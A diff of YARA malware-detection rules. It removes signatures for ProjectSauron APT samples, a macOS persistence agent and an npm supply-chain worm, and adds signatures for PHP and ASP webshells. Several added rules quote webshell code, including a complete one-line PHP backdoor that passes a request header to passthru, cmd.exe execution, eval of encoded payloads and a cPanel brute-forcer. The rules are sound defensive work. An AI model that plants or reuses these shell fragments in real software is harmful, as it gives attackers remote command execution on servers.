-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron.yara#L4-L21"
+		description = "PHP Webshells Github Archive - file Moroccan Spamers Ma-EditioN By GhOsT.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4fa9ce70-d300-55fe-bf98-636f026317ec"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6173-L6186"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "72f6c6fa65f15e4bab18a0f9d5b5b2f571b21d70c7ff306020784ce604a2e0a5"
+		hash = "31e5473920a2cc445d246bc5820037d8fe383201"
+		logic_hash = "0e3d2d97665b8849d121d63a22baf7393047a814dde3753e395418c1868b59be"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		version = "1.0"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "CreateNamedPipeW" fullword ascii
-		$a2 = "SetSecurityDescriptorDacl" fullword ascii
-		$a3 = "GetOverlappedResult" fullword ascii
-		$a4 = "TerminateThread" fullword ascii
-		$a5 = "%s%s%X" fullword wide
+		$s4 = "$content = chunk_split(base64_encode($content)); " fullword
+		$s12 = "print \"Sending mail to $to....... \"; " fullword
+		$s16 = "if (!$from && !$subject && !$message && !$emaillist){ " fullword
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) ) and filesize < 100000
+		all of them
 }
-
-rule SIGNATURE_BASE_Apt_Projectsauron_Encrypted_LSA : FILE
+rule SIGNATURE_BASE_Webshell_C99Madshell_V__2_0_Madnet_Edition
 {
 	meta:
-		description = "Rule to detect ProjectSauron encrypted LSA samples"
-		author = "Kaspersky Lab"
-		id = "f6fd8619-60f0-5c0d-aa66-cd0e154de63c"
-		date = "2016-08-08"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron.yara#L23-L47"
+		description = "PHP Webshells Github Archive - file C99madShell v. 2.0 madnet edition.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "51db0495-14f3-527e-865b-1405db57ff27"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6187-L6202"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "aaeee77b596e304836e23241fdc602d0ffed3379b386724210859c84033ac2b5"
+		hash = "f99f8228eb12746847f54bad45084f19d1a7e111"
+		logic_hash = "7cf825a604783ebc74b1dca53aaff5c886957c562e11276f2acce5ff1f6ab991"
 		score = 75
-		quality = 60
-		tags = "FILE"
-		version = "1.0"
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "EFEB0A9C6ABA4CF5958F41DB6A31929776C643DEDC65CC9B67AB8B0066FF2492" fullword ascii
-		$a2 = "\\Device\\NdisRaw_" ascii
-		$a3 = "\\\\.\\GLOBALROOT\\Device\\{8EDB44DC-86F0-4E0E-8068-BD2CABA4057A}" fullword wide
-		$a4 = "Global\\{a07f6ba7-8383-4104-a154-e582e85a32eb}" fullword wide
-		$a5 = "Missing function %S::#%d" fullword wide
-		$a6 = {8945D08D8598FEFFFF2BD08945D88D45BC83C20450C745C0030000008975C48955DCFF55FC8BF88D8F0000003A83F90977305333DB53FF15}
-		$a7 = {488D4C24304889442450488D452044886424304889442460488D4520C7442434030000002BD848897C243844896C244083C308895C246841FFD68D880000003A8BD883F909772DFF}
+		$s0 = "$md5_pass = \"\"; //If no pass then hash" fullword
+		$s1 = "eval(gzinflate(base64_decode('"
+		$s2 = "$pass = \"\";  //Pass" fullword
+		$s3 = "$login = \"\"; //Login" fullword
+		$s4 = "//Authentication" fullword
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( any of ( $a* ) or ( pe.exports ( "InitializeChangeNotify" ) and pe.exports ( "PasswordChangeNotify" ) and math.entropy ( 0x400 , filesize ) >= 7.5 ) ) and filesize < 1000000
+		all of them
 }
-
-rule SIGNATURE_BASE_Apt_Projectsauron_Encrypted_SSPI : FILE
+rule SIGNATURE_BASE_Webshell_Cmdasp_Asp_Php
 {
 	meta:
-		description = "Rule to detect encrypted ProjectSauron SSPI samples"
-		author = "Kaspersky Lab"
-		id = "43c0e772-46d2-510e-bea1-6f505199f38c"
-		date = "2016-08-08"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron.yara#L49-L63"
+		description = "PHP Webshells Github Archive - file CmdAsp.asp.php.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "184b1731-31a9-5040-aa25-d145e8064758"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6203-L6222"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "99d7444ffc45076e97ac3f5c9909ae26a927bbdcfef274d12d162c59e8113d65"
+		hash = "cb18e1ac11e37e236e244b96c2af2d313feda696"
+		logic_hash = "0fd9c7e83ad9ddf5cf88f1d1573324d9f24ae03a1951446fe11c116fd0cf4932"
 		score = 75
-		quality = 60
-		tags = "FILE"
-		version = "1.0"
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s1 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword
+		$s4 = "' Author: Maceo <maceo @ dogmile.com>" fullword
+		$s5 = "' -- Use a poor man's pipe ... a temp file -- '" fullword
+		$s6 = "' --------------------o0o--------------------" fullword
+		$s8 = "' File: CmdAsp.asp" fullword
+		$s11 = "<-- CmdAsp.asp -->" fullword
+		$s14 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
+		$s16 = "Set oScriptNet = Server.CreateObject(\"WSCRIPT.NETWORK\")" fullword
+		$s19 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 1000000 and pe.exports ( "InitSecurityInterfaceA" ) and pe.characteristics & pe.DLL and ( pe.machine == pe.MACHINE_AMD64 or pe.machine == pe.MACHINE_IA64 ) and math.entropy ( 0x400 , filesize ) >= 7.5
+		4 of them
 }
-rule SIGNATURE_BASE_Apt_Projectsauron_Mytrampoline : FILE
+rule SIGNATURE_BASE_Webshell_NCC_Shell
 {
 	meta:
-		description = "Rule to detect ProjectSauron MyTrampoline module"
-		author = "Kaspersky Lab"
-		id = "b4f2cabf-11da-5fa1-8c23-0a177f8a4741"
-		date = "2016-08-08"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron.yara#L65-L83"
+		description = "PHP Webshells Github Archive - file NCC-Shell.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3a2dab3d-faf0-52a5-b114-db402885c618"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6223-L6239"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0bd98815fbf6e82cf477e4f4f98360a4c132b2b21e2e5991f6c10903bd4df52b"
+		hash = "64d4495875a809b2730bd93bec2e33902ea80a53"
+		logic_hash = "c58edc548b7804be25f6956e9407cc9f8c74dfd8651f601a87ba639284e612d9"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		version = "1.0"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = ":\\System Volume Information\\{" wide
-		$a2 = "\\\\.\\PhysicalDrive%d" wide
-		$a3 = "DMWndClassX%d"
-		$b1 = "{774476DF-C00F-4e3a-BF4A-6D8618CFA532}" ascii wide
-		$b2 = "{820C02A4-578A-4750-A409-62C98F5E9237}" ascii wide
+		$s0 = " if (isset($_FILES['probe']) and ! $_FILES['probe']['error']) {" fullword
+		$s1 = "<b>--Coded by Silver" fullword
+		$s2 = "<title>Upload - Shell/Datei</title>" fullword
+		$s8 = "<a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->NCC<--</a></center></b><"
+		$s14 = "~|_Team .:National Cracker Crew:._|~<br>" fullword
+		$s18 = "printf(\"Sie ist %u Bytes gro" fullword
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 5000000 and ( all of ( $a* ) or any of ( $b* ) )
+		3 of them
 }
-
-rule SIGNATURE_BASE_Apt_Projectsauron_Encrypted_Container : FILE
+rule SIGNATURE_BASE_Webshell_Php_Webshells_README
 {
 	meta:
-		description = "Rule to detect ProjectSauron samples encrypted container"
-		author = "Kaspersky Lab"
-		id = "4462ebd9-24eb-570a-94b8-6fa6bf2a5a63"
-		date = "2016-08-08"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron.yara#L85-L103"
+		description = "PHP Webshells Github Archive - file README.md"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6240-L6252"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9b36f2f1161fd2ff856db520efca8648892656b7a2587dce1a7445af4fbba013"
+		hash = "ef2c567b4782c994db48de0168deb29c812f7204"
+		logic_hash = "aa8a9be74bbac08518d5ba442aa6fa37d3f1b255df48b49ccb9842f5728a49d5"
 		score = 75
-		quality = 60
-		tags = "FILE"
-		version = "1.0"
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$vfs_header = {02 AA 02 C1 02 0?}
-		$salt = {91 0A E0 CC 0D FE CE 36 78 48 9B 9C 97 F7 F5 55}
+		$s0 = "Common php webshells. Do not host the file(s) in your server!" fullword
+		$s1 = "php-webshells" fullword
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( @vfs_header < 0x4000 ) or $salt ) and math.entropy ( 0x400 , filesize ) >= 6.5 and ( filesize > 0x400 ) and filesize < 10000000
+		all of them
 }
-rule SIGNATURE_BASE_Apt_Projectsauron_Encryption : FILE
+rule SIGNATURE_BASE_Webshell_Backupsql
 {
 	meta:
-		description = "Rule to detect ProjectSauron string encryption"
-		author = "Kaspersky Lab"
-		id = "b3139045-54f5-5d59-980b-8510faa9ad0e"
-		date = "2016-08-08"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron.yara#L105-L123"
+		description = "PHP Webshells Github Archive - file backupsql.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "15d6e967-1e53-53b4-a2cf-7786452495d4"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6253-L6268"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ae3a681b0cf9ed93d25fa35982daab48c460ba9737eb643ba28a972ea3a7b401"
+		hash = "863e017545ec8e16a0df5f420f2d708631020dd4"
+		logic_hash = "0126bfad6eb3861e8322ac3e11b4fd95bc8b88597d916e66c6646d7d5529c1d5"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		version = "1.0"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = {81??02AA02C175??8B??0685}
-		$a2 = {918D9A94CDCC939A93939BD18B9AB8DE9C908DAF8D9B9BBE8C8C9AFF}
-		$a3 = {803E225775??807E019F75??807E02BE75??807E0309}
+		$s0 = "$headers .= \"\\nMIME-Version: 1.0\\n\" .\"Content-Type: multipart/mixed;\\n\" ."
+		$s1 = "$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog"
+		$s2 = "* as email attachment, or send to a remote ftp server by" fullword
+		$s16 = "* Neagu Mihai<neagumihai@hotmail.com>" fullword
+		$s17 = "$from    = \"Neu-Cool@email.com\";  // Who should the emails be sent from?, may "
 
 	condition:
-		filesize < 5000000 and any of ( $a* )
+		2 of them
 }
-rule SIGNATURE_BASE_Apt_Projectsauron_Generic_Pipe_Backdoor : FILE
+rule SIGNATURE_BASE_Webshell_AK_74_Security_Team_Web_Shell_Beta_Version
 {
 	meta:
-		description = "Rule to detect ProjectSauron generic pipe backdoors"
-		author = "Kaspersky Lab"
-		id = "77a82c67-7ee1-5d1f-ad75-28ce174e41bc"
-		date = "2016-08-08"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron.yara#L125-L144"
+		description = "PHP Webshells Github Archive - file AK-74 Security Team Web Shell Beta Version.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e93a6ac3-080f-53d3-8368-b9feb509a2ea"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6269-L6282"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ec8a311ec1bd98532c278f72c77e58edb5890db940046dfcd14adf1495e9de1e"
+		hash = "c90b0ba575f432ecc08f8f292f3013b5532fe2c4"
+		logic_hash = "4fbf8f5cab8593fd88e5a430b849e61d7d663c13700f459aa516c5b337d5438b"
 		score = 75
-		quality = 83
-		tags = "FILE"
-		version = "1.0"
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = { C7 [2-3] 32 32 32 32 E8 }
-		$b = { 42 12 67 6B }
-		$c = { 25 31 5F 73 }
-		$d = "rand"
-		$e = "WS2_32"
+		$s8 = "- AK-74 Security Team Web Site: www.ak74-team.net" fullword
+		$s9 = "<b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>'."
+		$s10 = "<b><font color=#83000>Execute system commands!</font></b>" fullword
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of them ) and filesize < 400000
+		1 of them
 }
-rule SIGNATURE_BASE_Persistence_Agent_Macos : FILE
+rule SIGNATURE_BASE_Webshell_Php_Webshells_Cpanel
 {
 	meta:
-		description = "Detects a Python agent that establishes persistence on macOS"
-		author = "John Lambert @JohnLaTwC"
-		id = "9c69af3c-ee85-58ac-8b78-66760addc117"
-		date = "2018-02-24"
-		modified = "2023-12-05"
-		reference = "https://ghostbin.com/paste/mz5nf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_osx_pyagent_persistence.yar#L1-L40"
+		description = "PHP Webshells Github Archive - file cpanel.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6283-L6299"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4288a81779a492b5b02bad6e90b2fa6212fa5f8ee87cc5ec9286ab523fc02446 cec7be2126d388707907b4f9d681121fd1e3ca9f828c029b02340ab1331a5524 e1cf136be50c4486ae8f5e408af80b90229f3027511b4beed69495a042af95be"
-		logic_hash = "2613fcb32cbdbb24df6c48fcb5d16549783e50246d2cdb8c473375644dd88254"
+		hash = "433dab17106b175c7cf73f4f094e835d453c0874"
+		logic_hash = "e4dc90c52648f1e5b7dc2d77dcb94feb774ec9e3c156c923c54a9e8f537bbf07"
 		score = 75
-		quality = 58
-		tags = "FILE"
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$h1 = "#!/usr/bin/env python"
-		$s_1 = "<plist" ascii fullword
-		$s_2 = "ProgramArguments" ascii fullword
-		$s_3 = "Library" ascii fullword
-		$sinterval_1 = "StartInterval" ascii fullword
-		$sinterval_2 = "RunAtLoad" ascii fullword
-		$e_1 = /(AHAAbABpAHMAdA|cGxpc3|PABwAGwAaQBzAHQA|PHBsaXN0|wAcABsAGkAcwB0A|xwbGlzd)/ ascii
-		$e_2 = /(AAcgBvAGcAcgBhAG0AQQByAGcAdQBtAGUAbgB0AHMA|AHIAbwBnAHIAYQBtAEEAcgBnAHUAbQBlAG4AdABzA|Byb2dyYW1Bcmd1bWVudH|cm9ncmFtQXJndW1lbnRz|UAByAG8AZwByAGEAbQBBAHIAZwB1AG0AZQBuAHQAcw|UHJvZ3JhbUFyZ3VtZW50c)/ ascii
-		$e_4 = /(AGkAYgByAGEAcgB5A|aWJyYXJ5|TABpAGIAcgBhAHIAeQ|TGlicmFye|wAaQBiAHIAYQByAHkA|xpYnJhcn)/ ascii
-		$einterval_a = /(AHQAYQByAHQASQBuAHQAZQByAHYAYQBsA|dGFydEludGVydmFs|MAdABhAHIAdABJAG4AdABlAHIAdgBhAGwA|N0YXJ0SW50ZXJ2YW|U3RhcnRJbnRlcnZhb|UwB0AGEAcgB0AEkAbgB0AGUAcgB2AGEAbA)/ ascii
-		$einterval_b = /(AHUAbgBBAHQATABvAGEAZA|dW5BdExvYW|IAdQBuAEEAdABMAG8AYQBkA|J1bkF0TG9hZ|UgB1AG4AQQB0AEwAbwBhAGQA|UnVuQXRMb2Fk)/ ascii
+		$s0 = "function ftp_check($host,$user,$pass,$timeout){" fullword
+		$s3 = "curl_setopt($ch, CURLOPT_URL, \"http://$host:2082\");" fullword
+		$s4 = "[ user@alturks.com ]# info<b><br><font face=tahoma><br>" fullword
+		$s12 = "curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);" fullword
+		$s13 = "Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir"
+		$s20 = "<br><b>Please enter your USERNAME and PASSWORD to logon<br>" fullword
 
 	condition:
-		uint32( 0 ) == 0x752f2123 and $h1 at 0 and filesize < 120KB and ( ( all of ( $s_* ) and 1 of ( $sinterval* ) ) or ( all of ( $e_* ) and 1 of ( $einterval* ) ) )
+		2 of them
 }
-rule SIGNATURE_BASE_MAL_JS_NPM_Supplychain_Attack_Nov25 : FILE
+rule SIGNATURE_BASE_Webshell_Accept_Language
 {
 	meta:
-		description = "Detects malicious JavaScript worm bun_environment.js"
-		author = "Marius Benthin"
-		id = "546c840f-b351-53a5-b00b-34223a2ad021"
-		date = "2025-11-24"
-		modified = "2025-12-15"
-		reference = "https://www.aikido.dev/blog/shai-hulud-strikes-again-hitting-zapier-ensdomains"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_npm_supply_chain_nov25.yar#L1-L22"
+		description = "PHP Webshells Github Archive - file accept_language.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "343ed2a4-4bed-5e73-8d05-f9573b0147af"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6300-L6311"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "62ee164b9b306250c1172583f138c9614139264f889fa99614903c12755468d0"
-		logic_hash = "b5a8da01ecb31dfa7a3921847a0fe26021b7618b1ee7a115a366b0854a4fa0a8"
-		score = 80
+		hash = "180b13576f8a5407ab3325671b63750adbcb62c9"
+		logic_hash = "6d45071722268f5b39b1486a7dce883ecefb2b3c9993357b7b58bd603ff1c40d"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sa1 = "npm publish"
-		$sa2 = "NPM_TOKEN"
-		$sa3 = "NPM_CONFIG_TOKEN"
-		$sb1 = "GITHUB_"
-		$sb2 = "GITLAB_"
-		$sb3 = "TEAMCITY_"
+		$s0 = "<?php passthru(getenv(\"HTTP_ACCEPT_LANGUAGE\")); echo '<br> by q1w2e3r4'; ?>" fullword
 
 	condition:
-		filesize < 20MB and all of ( $sa* ) and 2 of ( $sb* )
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_JS_NPM_Sha1_Hulud_Nov25 : FILE
+rule SIGNATURE_BASE_Webshell_Php_Webshells_529
 {
 	meta:
-		description = "Detects suspicious indicators for Sha1 Hulud worm"
-		author = "Marius Benthin"
-		id = "81924803-f9fe-51bf-b7b3-8b174c865e59"
-		date = "2025-11-24"
-		modified = "2025-12-15"
-		reference = "https://www.aikido.dev/blog/shai-hulud-strikes-again-hitting-zapier-ensdomains"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_npm_supply_chain_nov25.yar#L24-L39"
+		description = "PHP Webshells Github Archive - file 529.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6312-L6329"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "62ee164b9b306250c1172583f138c9614139264f889fa99614903c12755468d0"
-		logic_hash = "95f7e657108bc63825f969baa28211c5c63746f525db5e71a486d76aaf98ba32"
-		score = 70
+		hash = "ba3fb2995528307487dff7d5b624d9f4c94c75d3"
+		logic_hash = "f46b84d51077f157c83cd01534dfe7f9cd0d9ef04ad9935ced22d2abc873c171"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "Sha1-Hulud:\\x"
-		$x2 = "SHA1HULUD\"`"
+		$s0 = "<p>More: <a href=\"/\">Md5Cracking.Com Crew</a> " fullword
+		$s7 = "href=\"/\" title=\"Securityhouse\">Security House - Shell Center - Edited By Kin"
+		$s9 = "echo '<PRE><P>This is exploit from <a " fullword
+		$s10 = "This Exploit Was Edited By KingDefacer" fullword
+		$s13 = "safe_mode and open_basedir Bypass PHP 5.2.9 " fullword
+		$s14 = "$hardstyle = explode(\"/\", $file); " fullword
+		$s20 = "while($level--) chdir(\"..\"); " fullword
 
 	condition:
-		filesize < 20MB and 1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_SUSP_JS_NPM_Setupscript_Nov25 : FILE
+rule SIGNATURE_BASE_Webshell_STNC_Webshell_V0_8
 {
 	meta:
-		description = "Detects suspicious JavaScript which exits silently and checks operating system"
-		author = "Marius Benthin"
-		id = "1058da69-a0c2-5258-a5b5-1a9995433a3a"
-		date = "2025-11-24"
-		modified = "2025-12-15"
-		reference = "https://www.aikido.dev/blog/shai-hulud-strikes-again-hitting-zapier-ensdomains"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_npm_supply_chain_nov25.yar#L41-L61"
+		description = "PHP Webshells Github Archive - file STNC WebShell v0.8.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5dc300a2-9965-52e3-a382-b8d327eb7029"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6330-L6343"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a3894003ad1d293ba96d77881ccd2071446dc3f65f434669b49b3da92421901a"
-		logic_hash = "b685f642d1d62200da973aad7fd7a2d606a098b92524aaebe5e2bb45c63f3155"
-		score = 70
+		hash = "52068c9dff65f1caae8f4c60d0225708612bb8bc"
+		logic_hash = "c2067a1b78c441aa05366b612090e0df895c621843038cc9e65beb6719c0cb9a"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sa1 = "require('child_process')"
-		$sa2 = "process.platform ==="
-		$sb1 = "().catch((e"
-		$sb2 = "process.exit(0)"
+		$s3 = "if(isset($_POST[\"action\"])) $action = $_POST[\"action\"];" fullword
+		$s8 = "elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean()"
+		$s13 = "{ $pwd = $_POST[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw"
 
 	condition:
-		filesize < 100KB and all of ( $sa* ) and $sb1 in ( filesize - 50 .. filesize ) and $sb2 in ( filesize - 30 .. filesize )
+		2 of them
 }
-rule SIGNATURE_BASE_MAL_NPM_Supplychain_Attack_Preinstallscript_Nov25 : FILE
+rule SIGNATURE_BASE_Webshell_Php_Webshells_Tryag
 {
 	meta:
-		description = "Detects known malicious preinstall script in package.json"
-		author = "Marius Benthin"
-		id = "a94f2c7b-4d0c-54b3-8370-556f8b507759"
-		date = "2025-11-24"
-		modified = "2025-12-16"
-		reference = "https://www.aikido.dev/blog/shai-hulud-strikes-again-hitting-zapier-ensdomains"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_npm_supply_chain_nov25.yar#L63-L76"
+		description = "PHP Webshells Github Archive - file tryag.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6344-L6359"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c4bc2afd133916f064f2fb7d1e2e067ea65db33463eeae2fa54a9860a6303865"
-		logic_hash = "7472fc4759bbf03abd05a0eade1144c7ca3ab31af26ed4eab4028056027b2e47"
-		score = 80
+		hash = "42d837e9ab764e95ed11b8bd6c29699d13fe4c41"
+		logic_hash = "2af3bbe8d1940e60843f3f5d40c9c6550e76df21568c374f7a871f73aeefae44"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "\"preinstall\": \"node setup_bun.js\""
+		$s1 = "<title>TrYaG Team - TrYaG.php - Edited By KingDefacer</title>" fullword
+		$s3 = "$tabledump = \"DROP TABLE IF EXISTS $table;\\n\"; " fullword
+		$s6 = "$string = !empty($_POST['string']) ? $_POST['string'] : 0; " fullword
+		$s7 = "$tabledump .= \"CREATE TABLE $table (\\n\"; " fullword
+		$s14 = "echo \"<center><div id=logostrip>Edit file: $editfile </div><form action='$REQUE"
 
 	condition:
-		filesize < 10KB and all of them
+		3 of them
 }
-rule SIGNATURE_BASE_MAL_WIPER_Caddywiper_Mar22_1 : FILE
+rule SIGNATURE_BASE_Webshell_Dc3_Security_Crew_Shell_Priv_2
 {
 	meta:
-		description = "Detects CaddyWiper malware"
+		description = "PHP Webshells Github Archive - file dC3 Security Crew Shell PRiV.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "83495a0d-a295-5ec7-9761-ce79918e1034"
-		date = "2022-03-15"
